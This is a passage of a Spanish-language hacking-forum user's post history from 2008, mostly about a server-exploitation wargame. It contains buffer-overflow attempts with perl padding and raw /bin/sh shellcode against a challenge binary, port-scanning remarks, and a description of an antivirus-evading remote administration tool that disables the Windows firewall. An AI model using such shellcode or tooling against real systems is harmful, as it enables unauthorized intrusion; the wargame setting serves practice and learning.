Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#4191
CitarPodriais capar el netstat -an
+ Como dice sdc, /var/log
+ /tmp (no se porque ahi hay unos directorios que dicen imagenes y aparece uno con el nombre de sdc  :huh:)
+ lo del netstat ya lo habia visto al igual que ifconfig y podías ver cuantas personas estaban conectadas viendo el puerto de conexión http(80).
+ /media (No tiene lectores o discos esclavos  :( )
+ Hay unos juegos muy chidos para consola  ;D podrías subirlos en un zip para jugarlos en local jaja.

En fin pero nada de explotación jajaja creo que no es mi fuerte, no todos tenemos el mismo tipo de conocimiento verdad?  :P

Anon podrías habilitar el comando msg para conversar con los usuarios que estén dentro como se hizo la otra ves.

Saludos y suerte para el resto
#4192
Nop no carga, ayer el servidor real del warzone también estaba off y como se veia la shell funcionando ps lo mas probable es que alguien esté lanzando algún ataque ddos.
Si es así lo mas probable también es que no tenga ni la mas minima idea de como entrar y por frustración la gente se desespera y comienza a hacer tonterías para sentirse tomados en cuenta.

(sugerencia) Sdc, podrías poner la web en un servidor ajeno a la shell y en ves de entrar que te de la ip del servidor con la shell real y asi evitas que un ataque al pedo proboque que no podamos entrar
#4193
WarZone / Re: Torneo de explotacion de servidores
30 Noviembre 2008, 02:35 AM
Si, no se ve pero la shell anda impecable porque no está dentro del servidor del wargame.

http://shell.wargame.elhacker.net/
#4194
WarZone / Re: Torneo de explotacion de servidores
30 Noviembre 2008, 02:01 AM
Ya, me aburrí, mañana será otro dia  :P

Citar./BoF `perl -e 'print "?" x 998'``../xxx/shellcode`
./BoF `perl -e 'print "?" x 1036'``../xxx/shellcode`

CitarSegmentation fault

Probé del 990 al 1070 para ver si me habia equibocado en el tamaño de la shellcode pero nada. y pruebo la shellcode y me lanza la shell pero al bolcar el buffer sobre el BoF no funciona. Para eso tube que modificar de la ejecución a printf guiandome por goodfellas (http://goodfellas.shellcode.com.ar/bsd.html).

Citar$ ./BoF `perl -e 'print "?" x 1035'``../xxx/shellcode`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$

Tampoco ..

Citar./BoF `perl -e 'print "?" x 1056 . "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";'`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
[/quote]

Tampoco, shaaaaaa  :rolleyes:

Citar???????????????????????????????????????Ù↨[1└êCëëC♀PìRS░;P═ÇÞõ   /bin/sh
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
chown: not found
chown: not found
Mas facil no se puede xD
Usted paso como parametro lo siguiente:

¾Ý┐┐☺¯┐┐↕¯┐┐&¯┐┐N¯┐┐V¯┐┐c¯┐┐ǯ┐┐ø¯┐┐ª¯┐┐▓¯┐┐┐¯┐┐╦¯┐┐ί┐┐>´┐┐J´┐┐P´┐┐_´┐┐n´┐┐Ç´┐┐
ò´┐┐ª´┐┐
Segmentation fault
$
#4195
WarZone / Re: Torneo de explotacion de servidores
30 Noviembre 2008, 00:12 AM
Citar$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $  Adv
ertencia "/usr/home/warzone/validar"
Solo puede ser ejecutado 10 veces por Usted
Esta vez no cuenta solo le informa el uso:
        Debera ejecutarlo usando path absoluto o relativo
        da igual esto es asu gusto.
Se le pedira el hash del reto N, donde N el ultimo reto que ha Ejecutado
Esto es por seguridad y para evitar un ForceBrute.
Note que cada vez que ejecute los programas vulnerables se va
a generar un Hash Aleatorio

        Saludos y Suerte.

Anon.
/usr/home/warzone/.db/count_ /usr/home/warzone/.db/reto_ %s%d r+ %s w fopen():
%s r    Usted no a ejecutado ningun Reto!
No cuenta esta ejecucion Ejecutado: %d
Hash de la Prueba %d:  Perfecto ;)    /usr/home/warzone/.db/grupos %d %d %d No
es Igual!! ;(  Lo sentimos ya ha sobrepaso el limite de Ejecuciones!!
Guadar calloc(): %s $FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:3
   \♦   $♣   á♠   Óü♦ ¶á┤î    ☺   §   ♀   îà♦

Como es que puedo ejecutarlo solo 10 veces si cuando lo ejecuto me da errores
Citarsh ./validar
‼4: not found
⌂ELF☺☺☺: not found
./validar: 4: Syntax error: "(" unexpected (expecting ")")

No sabía que solo se podía ejecutar 10 veces :-s talves ya la jodí jajaja o talves se ejecute bién cuando logre pasar la primera parte no se pero bueno.

PD: Olvidalo ya se que pasó y estoy viendo lo de la shellcode.
#4196
WarZone / Re: Torneo de explotacion de servidores
29 Noviembre 2008, 21:14 PM
Ya entré.

CitarMas facil no se puede xD
    Se esperaban Parametros!!
Uso:
        %s <algo>
  Usted paso como parametro lo siguiente:

%s
calloc(): %s

Esto me recuerda y si es que no me equivoco debe ser el mismo, la prueba que hicieron hace tiempo en la sección de wargames donde alguien prestó su servidor con el mismo sistema donde estamos ahora y al parecer con el mismo programa y con la misma falla  :P solo que la shell no es una shell sino que es un pipe a quien sabe donde.

De todas formas intenté:
Citarsh ./validar `perl -e 'print "?" x 1036'`
aunque en checker y BoF me dió lo mismo: nada.

No soy tan bueno para los bof como berz3k :P

PD: hacen mas de 30 grados de calor y me duele la cabeza a mares :-\
PD2: Busqué en los post anteriores del foro de wargames hasta la última página y ya no está  :huh: supongo que no lo movieron/borraron apropósito vdd?
#4197
WarZone / Re: Torneo de explotacion de servidores
29 Noviembre 2008, 08:55 AM
Citarya lo viiiiii!!  es windowssssssssssssssssssssssssssssssssssssssssss
aunque dudo que logren encontrar como iniciar sesion mas del 10%

Yo pensaba que era bsd pero bueno, supongo que verificar los puertos tampoco hace daño no? el netcat me arrojó todos los puertos abiertos XD asi que tube que usar el nmap mejor y no encontré nada jajajaja no voy a decir como intenté entrar para que lo intenten también los demás  :P pero de todas las maneras que traté no pude.

Supongo que esto va de buena forma y no de mala verdad? por algo dieron user y pass, supongo que de entrada no hay que explotar nada como la falla de los win server o un rpcdcom  :rolleyes:.

Si la falla no va a nivel web supongo que la vulnerabilidad del php que tiene no tiene nada que ver  :P

Que rabia, con las ganas que tenía de entrar, suponiendo que es win sería mas fácil.
#4198
PHP / Re: [Proyecto] El Maletín (Fuente)
18 Noviembre 2008, 22:37 PM
Código actualizado que repara el bug de la variable [-info] al no detectar valores en sistemas virtualizados.

estuve pensando seriamente que al cambiar el idioma de las respuestas que da la consola de comandos puede dar un valor erroneo al intentar capturarlo, voy a tener que hacerlo de una forma diferente detectando cada array de respuesta.

Hola IngAmc  ;D
#4199
PHP / [Proyecto] El Maletín (Fuente)
17 Noviembre 2008, 21:34 PM
El maletín 1.2 Beta

Bueno, este no es un script para una web, sino la fuente para un archivo binario ejecutable para Win32.

Ahora ustedes dirán:
Citar:o de php a exe??
Así es, con el BamCompiler.

De que se trata?... Es un software de administración remota donde la idea es que contenga todas las herramientas mas simples y necesarias para la buena y cómoda administración de una shell remota.

Expongo acá su código fuente para ver si me pueden apoyar en algunas lineas y dar ideas, etc.

Si alguien quiere ofrecerse de BetaTester pueden hacerlo en el subforo de "Análisis de malware".

La idea principal de este software es poder hacer pruebas localmente o remotamente pidiendoles la cooperación de la persona involucrada tal como se los estoy pidiendo yo, en ningún caso debe utilizarse para administrar un sistema que no sea de nuestra propiedad o sin el concentimiento de su dueño. Esto es para evitar problemas legales y poder comprender como protegernos ante ataques remotos sin la necesidad de presindir por el antivirus ya que hasta la fecha no es detectado por ningún sistema antimalware ni antivirus a exepción ovbiamente de los Firewalls, aunque con unas pequeñas funciones pueden deshabilitarse tal como lo programé para el firewall de Windows XP y Vista.

Descargar Fuente

Como pueden ver muchas de las funciones están sin crear ya que en php no hay Handle que puedas utilizar para alguna función, por lo cual me veo casi obligado a utilizar softwares externos como por ejemplo "REG" y "wmic".

Binario y Pruebas con el binario en este subforo:
http://foro.elhacker.net/analisis_y_diseno_de_malware/proyecto_el_maletin-t234529.0.html
#4200
ya voy en la 8

Citar<!-- YOU'RE LOOKING IN THE WRONG PLACE... GO BACK! -->
:¬¬

Editado
En la 9.
Reeditado :P
En la 10
CitarWarning: Cannot modify header information - headers already sent by (output started at /home/hackert/public_html/gazebruh.php:11) in /home/hackert/public_html/gazebruh.php on line 58
Rereeditado
Vaya nombre del php del nivel 13  :P eso en mi pais tiene un significado.

rerererereditado  :xD
CitarCongratulations! You have passed to level 10. Here, things become much more difficult ;-) Hope you get through! Enjoy.
ya lo terminé, de seguro el nivel 21 es este: http://www.hackertest.net:2082/login/